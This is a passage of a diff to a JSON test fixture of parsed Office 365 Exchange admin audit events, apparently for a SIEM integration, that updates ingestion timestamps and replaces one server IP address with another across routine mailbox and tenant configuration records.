"67.43.156.13" ] }, "organization": { @@ -5562,8 +5562,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177769900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853332600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5583,12 +5583,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5620,7 +5620,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5632,8 +5632,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177772700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853338400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5653,12 +5653,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5689,7 +5689,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5701,8 +5701,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177775700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853344300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5722,12 +5722,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5759,7 +5759,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5771,8 +5771,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177780500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853350400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5792,12 +5792,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5827,7 +5827,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5839,8 +5839,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177783500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853356100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5860,12 +5860,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5897,7 +5897,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5909,8 +5909,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177786500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853361900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5930,12 +5930,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5965,7 +5965,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5977,8 +5977,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177789300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853367600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5998,12 +5998,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6035,7 +6035,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6047,8 +6047,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177792100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853373300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6068,12 +6068,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6116,7 +6116,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -6128,8 +6128,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177794700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853379Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 